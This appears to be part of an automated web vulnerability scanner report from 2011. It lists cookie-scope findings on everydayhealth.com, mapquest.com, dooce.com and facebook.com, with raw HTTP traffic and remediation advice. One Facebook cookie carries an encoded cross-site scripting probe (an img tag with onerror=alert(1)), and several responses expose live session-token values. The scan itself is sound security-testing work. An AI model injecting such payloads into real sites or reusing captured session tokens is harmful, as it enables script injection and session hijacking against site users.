mYPZBYCAgEPDxYCHwUFQ2h0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGguY29tL2tpZHMtaGVhbHRoL3RvZGRsZXJzLWFuZC1zaGFyaW5nLmFzcHhkFgJmDxUBHFRlYWNoaW5nICBUb2RkbGVycyAgVG8gU2hhcmVkAgEPZBYCAgEPDxYCHwUFS2h0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGguY29tL2tpZHMtaGVhbHRoL3NsZWVwLXNvbHV0aW9ucy1mb3ItdG9kZGxlcnMuYXNweGQWAmYPFQEdU2xlZXAgU29sdXRpb25zIEZvciAgVG9kZGxlcnNkAgIPZBYCAgEPDxYCHwUFRGh0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGguY29tL2tpZHMtaGVhbHRoL3RvZGRsZXJzLXBpY2t5LWVhdGVycy5hc3B4ZBYCZg8VAShIb3cgVG8gR2V0IFBpY2t5IEVhdGVycyBUbyBUcnkgTmV3IEZvb2RzZAIHD2QWBAIBD2QWAgICDw8WAh8BaGRkAgUPFgIfAWdkZA==" />
...[SNIP]...

9.5. http://www.everydayhealth.com/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.everydayhealth.com
Path:   /sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx

Request

GET /sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:56:33 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpO9S9eM0ZDUxYzkzYi0zMDJmLTQwYmYtOTcwNC1mNDg4N2I4MDBiZmM1; expires=Wed, 13-Jul-2011 21:36:33 GMT; path=/
Set-Cookie: ASP.NET_SessionId=tew4lhmlby1awfarbc5plyur; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47316


<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

<head id="head"><title>
   3 Ways to Put the Wow! Back in Your Sex Life - Sexual Heal
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTMwOTUyNTA1MQ9kFgQCAQ9kFgICBA8WAh4EVGV4dAXHBw0KPG1ldGEgcHJvcGVydHk9Im9nOnRpdGxlIiBjb250ZW50PSIzIFdheXMgdG8gUHV0IHRoZSBXb3chIEJhY2sgaW4gWW91ciBTZXggTGlmZSAtIFNleHVhbCBIZWFsdGggQ2VudGVyIC0gRXZlcnlkYXkgSGVhbHRoIi8+DQo8bWV0YSBwcm9wZXJ0eT0ib2c6ZGVzY3JpcHRpb24iICBydW5hdD0ic2VydmVyIiAgaWQ9ImZiZGVzY3JpcHRpb24iIGNvbnRlbnQ9IlRoZXJlIGFyZSBtYW55IHRyZWF0bWVudCBvcHRpb25zIGF2YWlsYWJsZSB0byBoZWxwIHNleHVhbCBhcm91c2FsIGRpc29yZGVyLiBMZWFybiBhYm91dCBzZXggdGhlcmFweSwgaG9ybW9uZSB0aGVyYXB5LCBhbmQgb3RoZXIgYW5zd2VycyBmb3IgdGhpcyBzZXggZGlzb3JkZXIuIiA+DQo8bWV0YSBwcm9wZXJ0eT0ib2c6dHlwZSIgY29udGVudD0iYXJ0aWNsZSIgLz4NCjxtZXRhIHByb3BlcnR5PSJvZzppbWFnZSIgY29udGVudD0iaHR0cDovL2ltYWdlcy5hZ29yYW1lZGlhLmNvbS9ldmVyeWRheWhlYWx0aC9nY21zL2xvZ29fZWhfNTB4NTAuZ2lmIiAvPg0KPG1ldGEgcHJvcGVydHk9Im9nOnNpdGVfbmFtZSIgY29udGVudD0iRXZlcnlkYXlIZWFsdGguY29tIi8+DQo8bWV0YSBwcm9wZXJ0eT0iZmI6YXBwX2lkIiBjb250ZW50PSIxMzUzNDYwMzY0OTAxODYiLz4NCjxtZXRhIHByb3BlcnR5PSJmYjphZG1pbnMiIGNvbnRlbnQ9IiIgLz4NCjxtZXRhIHByb3BlcnR5PSJvZzp1cmwiIHJ1bmF0PSJzZXJ2ZXIiIGlkPSJmYnVybCIgY29udGVudD0iaHR0cDovL3d3dy5ldmVyeWRheWhlYWx0aC5jb20vc2V4dWFsLWhlYWx0aC9zZXh1YWwtZHlzZnVuY3Rpb24vYWRkaXRpb25hbC10cmVhdG1lbnRzLWZvci1mZW1hbGUtc2V4dWFsLWFyb3VzYWwtZGlzb3JkZXIuYXNweCIgLz4NCg0KPHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiIHNyYz0iaHR0cDovL2Nvbm5lY3QuZmFjZWJvb2submV0L2VuX1VTL2FsbC5qcyN4ZmJtbD0xIj48L3NjcmlwdD5kAgMPZBYCAgEPZBYCAgIPZBYIZg9kFgRmDw8WAh4HVmlzaWJsZWhkZAIBD2QWAgIBD2QWAmYPDxYEHghDc3NDbGFzcwUKdmVydGljYWxhZB4EXyFTQgICZGQCAg9kFgICAQ9kFgQCAQ8PFgIfAAUOTmV4dCBBcnRpY2xlOiBkZAIDDxYCHgtfIUl0ZW1Db3VudAIBFgJmD2QWAgIBDw8WAh4LTmF2aWdhdGVVcmwFYmh0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGguY29tL3NleHVhbC1oZWFsdGgvc2V4dWFsLWR5c2Z1bmN0aW9uL2ZlbWFsZS1zZXh1YWwtYXJvdXNhbC1kaXNvcmRlci5hc3B4ZBYCZg8VATNUaGUgRmFjdHMgQWJvdXQgRmVtYWxlICBTZXh1YWwgICBBcm91c2FsICAgRGlzb3JkZXJkAgMPZBYGAgEPZBYEAgEPDxYCHwAFIVJlbGF0ZWQgQXJ0aWNsZXMgb24gU2V4dWFsIEhlYWx0aGRkAgMPFgIfBAIDFgZmD2QWAgIBDw8WAh8FBWJodHRwOi8vd3d3LmV2ZXJ5ZGF5aGVhbHRoLmNvbS9zZXh1YWwtaGVhbHRoL3NleHVhbC1keXNmdW5jdGlvbi9mZW1hbGUtc2V4dWFsLWFyb3VzYWwtZGlzb3JkZXIuYXNweGQWAmYPFQEzVGhlIEZhY3RzIEFib3V0IEZlbWFsZSAgU2V4dWFsICAgQXJvdXNhbCAgIERpc29yZGVyZAIBD2QWAgIBDw8WAh8FBUFodHRwOi8vd3d3LmV2ZXJ5ZGF5aGVhbHRoLmNvbS9zZXh1YWwtaGVhbHRoL3ZpYWdyYS1mb3Itd29tZW4uYXNweGQWAmYPFQERVmlhZ3JhIEZvciBXb21lbj9kAgIPZBYCAgEPDxYCHwUFUmh0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGguY29tL3NleHVhbC1oZWFsdGgvaHlwb2FjdGl2ZS1zZXh1YWwtZGVzaXJlLWRpc29yZGVyLmFzcHhkFgJmDxUBKldoYXQgSXMgSHlwb2FjdGl2ZSBTZXh1YWwgRGVzaXJlIERpc29yZGVyP2QCAg9kFgQCAQ8PFgIfAAUTTW9yZSBvbiBNZWRpY2F0aW9uc2RkAgMPFgIfBAIDFgZmD2QWAgIBDw8WAh8FBSxodHRwOi8vd3d3LmV2ZXJ5ZGF5aGVhbHRoLmNvbS9kcnVncy9rbG9ub3BpbmQWAmYPFQEIS2xvbm9waW5kAgEPZBYCAgEPDxYCHwUFKmh0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGguY29tL2RydWdzL2FtYmllbmQWAmYPFQEGQW1iaWVuZAICD2QWAgIBDw8WAh8FBSpodHRwOi8vd3d3LmV2ZXJ5ZGF5aGVhbHRoLmNvbS9kcnVncy96b2xvZnRkFgJmDxUBBlpvbG9mdGQCAw8PFgIfAWhkFgQCAQ8PFgIfAAUfQXNrIGEgUGhhcm1hY2lzdDogU2V4dWFsIEhlYWx0aGRkAgMPFgIfBGZkAgcPZBYCAgEPZBYCAgIPDxYCHwFoZGRk" />
...[SNIP]...

10. Cookie scoped to parent domain  previous  next
There are 119 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


10.1. http://www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dooce.com
Path:   /|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/ HTTP/1.1
Host: www.dooce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 05 May 2011 10:56:29 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.11
X-Powered-By: PHP/5.2.11
Set-Cookie: SESS30952fbaf4ac11922b9cafbdf8d115e4=3978a428e0c8068b8d55294bde46612c; expires=Sat, 28-May-2011 14:29:49 GMT; path=/; domain=.dooce.com
Last-Modified: Thu, 05 May 2011 10:55:52 GMT
ETag: "7f0e32fa0924b70c7c5abdc1af28feda"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 10192

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"xmlns=xmlns:og="http://opengraphprot
...[SNIP]...

10.2. http://www.mapquest.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mapquest.com
Path:   /

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?ncid=txtlnkmqmq00000001 HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: t_Id=ZGVmYXVsdDpudWxs; Path=/
Set-Cookie: tsession="PpBmGmuR4mRIyqziAQ2PxT1oEdE="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:03 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:03 GMT; Path=/
Set-Cookie: psession="B2III+t4bMnXkU9N54bv280ThuY="; Version=1; Domain=mapquest.com; Max-Age=7776000; Expires=Wed, 03-Aug-2011 00:57:03 GMT; Path=/
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:03 GMT; Path=/
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Thu, 05 May 2011 00:57:02 GMT
Content-Length: 32047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en" xml:lang="en" c
...[SNIP]...

10.3. http://www.mapquest.com/_svc/ad/getads  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mapquest.com
Path:   /_svc/ad/getads

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /_svc/ad/getads HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
Origin: http://www.mapquest.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/json; charset=UTF-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_Id=ZGVmYXVsdDpudWxs; tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; psession="FAoATxmA8Lim4iO1MAgenPPZWkY="
Content-Length: 732

{"request":{"pageView":"initial","userLocale":"en_US","userState":{"locations":[{"role":"mapcenter","lattitude":32.78699999999999,"longitude":-96.79900000000002}],"legs":[],"searches":[],"routeDistanc
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:09 GMT; Path=/
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
Expires: Mon, 20 Dec 1998 01:00:00 GMT
Last-Modified: Thu, 05 May 2011 00:57:09 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: application/json
Date: Thu, 05 May 2011 00:57:09 GMT
Content-Length: 464

{"data":{"parameters":{"dotcom-right-header":{"adParametersTypeString":"HTML","encodedStateHash":null,"htmlText":"","type":"HTML"},"bottom-content":{"adParametersTypeString":"UAC","adTitle":null,"adTy
...[SNIP]...

10.4. http://www.mapquest.com/_svc/apixel  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mapquest.com
Path:   /_svc/apixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_svc/apixel?t=jsop&i=_0&v=4&1=mq.main&2=mq%20main&3=no%20referrer&4=map%20%3A%20afarm%20%3A%20baseline&5=none&6=null&7=undefined&8=null HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_Id=ZGVmYXVsdDpudWxs; tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; psession="FAoATxmA8Lim4iO1MAgenPPZWkY="; s_pers=%20s_getnr%3D1304575026551-New%7C1367647026551%3B%20s_nrgvo%3DNew%7C1367647026552%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:11 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:11 GMT; Path=/
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:11 GMT; Path=/
Pragma: no-cache
Cache-Control: no-cache,no-store,must-revalidate
Expires: Mon, 1 Feb 2001 08:32:00 GMT
Content-Type: image/gif
Content-Length: 35
Date: Thu, 05 May 2011 00:57:10 GMT

GIF87a.............,...........D..;

10.5. http://www.mapquest.com/_svc/publishing/promo  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mapquest.com
Path:   /_svc/publishing/promo

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /_svc/publishing/promo HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
Origin: http://www.mapquest.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/json; charset=UTF-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_Id=ZGVmYXVsdDpudWxs; tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; psession="FAoATxmA8Lim4iO1MAgenPPZWkY="
Content-Length: 62

{"key":"winston-site-selector","language":"en","country":"us"}

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:09 GMT; Path=/
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
Expires: Mon, 20 Dec 1998 01:00:00 GMT
Last-Modified: Thu, 05 May 2011 00:57:09 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: application/json
Date: Thu, 05 May 2011 00:57:08 GMT
Content-Length: 1199

{"data":{"text":"<ul>\r\n <li><a onclick=\"m3.util.Event.publish('EventLog', {action: 'MQSITES-ROUTEPLANNER-CLICK'});\" href=\"http://www.mapquest.com/routeplanner\">Route Planner</a></li>\r\n <
...[SNIP]...

10.6. http://www.mapquest.com/_svc/searchio  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mapquest.com
Path:   /_svc/searchio

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_svc/searchio?action=config&locale=en_US&shapepoints=(32.93119675804705,-96.97066137694627,32.64256910519762,-96.62733862305373) HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_Id=ZGVmYXVsdDpudWxs; tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; psession="FAoATxmA8Lim4iO1MAgenPPZWkY="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:09 GMT; Path=/
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
Cache-Control: no-transform
Content-Type: application/json;charset=UTF-8
Date: Thu, 05 May 2011 00:57:08 GMT
Content-Length: 101621

{"advertisers":[{"addressSummaryPrefixUrl":null,"addressSummaryTracking":[],"bannerAds":[{"height":0,"magicNumber":"93306669","type":"234x60","width":0}],"branded":true,"brandedSearchOnly":false,"clus
...[SNIP]...

10.7. http://www.mapquest.com/cdn/_uac/adpage.htm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mapquest.com
Path:   /cdn/_uac/adpage.htm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cdn/_uac/adpage.htm HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_Id=ZGVmYXVsdDpudWxs; psession="FAoATxmA8Lim4iO1MAgenPPZWkY="; s_pers=%20s_getnr%3D1304575026551-New%7C1367647026551%3B%20s_nrgvo%3DNew%7C1367647026552%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:11 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:11 GMT; Path=/
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:11 GMT; Path=/
Accept-Ranges: bytes
ETag: W/"1171-1304454928000"
Last-Modified: Tue, 03 May 2011 20:35:28 GMT
Content-Type: text/html
Cteonnt-Length: 1171
Date: Thu, 05 May 2011 00:57:10 GMT
Content-Length: 1171

<html>
<head>
<script type='text/javascript'>
var blockedReferrer = "";
var dom=location.hash
if (dom!=''){
dom=dom.substr(1)
document.domain=dom
}

function adsPageOnL(){
var adFr=window.frameE
...[SNIP]...

10.8. http://www.mapquest.com/cdn/dotcom3/images/new_purple_button.jpg  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mapquest.com
Path:   /cdn/dotcom3/images/new_purple_button.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cdn/dotcom3/images/new_purple_button.jpg HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_Id=ZGVmYXVsdDpudWxs; tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; psession="FAoATxmA8Lim4iO1MAgenPPZWkY="; s_pers=%20s_getnr%3D1304575026551-New%7C1367647026551%3B%20s_nrgvo%3DNew%7C1367647026552%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:10 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:10 GMT; Path=/
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:10 GMT; Path=/
Accept-Ranges: bytes
ETag: W/"660-1304454926000"
Last-Modified: Tue, 03 May 2011 20:35:26 GMT
Content-Type: image/jpeg
Content-Length: 660
Date: Thu, 05 May 2011 00:57:09 GMT

.PNG
.
...IHDR...,.........J3......tEXtSoftware.Adobe ImageReadyq.e<...6IDATx.b...?.P..C..,+'..Z.& ...~Pz .w >..w.q.1.o.b.A...@\.b0.P ....cA...=p9..7... K.8...M...as.=....RB....13...r..BbB...\..y
...[SNIP]...

10.9. http://www.mapquest.com/icons/stop.png  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mapquest.com
Path:   /icons/stop.png

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /icons/stop.png?text=A HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_Id=ZGVmYXVsdDpudWxs; tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; psession="FAoATxmA8Lim4iO1MAgenPPZWkY="; s_pers=%20s_getnr%3D1304575026551-New%7C1367647026551%3B%20s_nrgvo%3DNew%7C1367647026552%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:10 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:10 GMT; Path=/
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:10 GMT; Path=/
Last-Modified: Tue, 03 May 2011 20:35:24 GMT
Expires: Thu, 05 May 2011 01:21:10 GMT
Content-Type: image/png
Date: Thu, 05 May 2011 00:57:09 GMT
Content-Length: 923

.PNG
.
...IHDR.............e/O]...bIDATx....K.Q..p!.......B..H...x.LM!..m....L.i*....y...-.."...@0....YI.."J...5...wv6...[.m.e...9.....9...8....WN`Na$<t..[..0)f..5C..Y......L.TH.$.^[....
..M.{).%...
...[SNIP]...

10.10. http://www.facebook.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
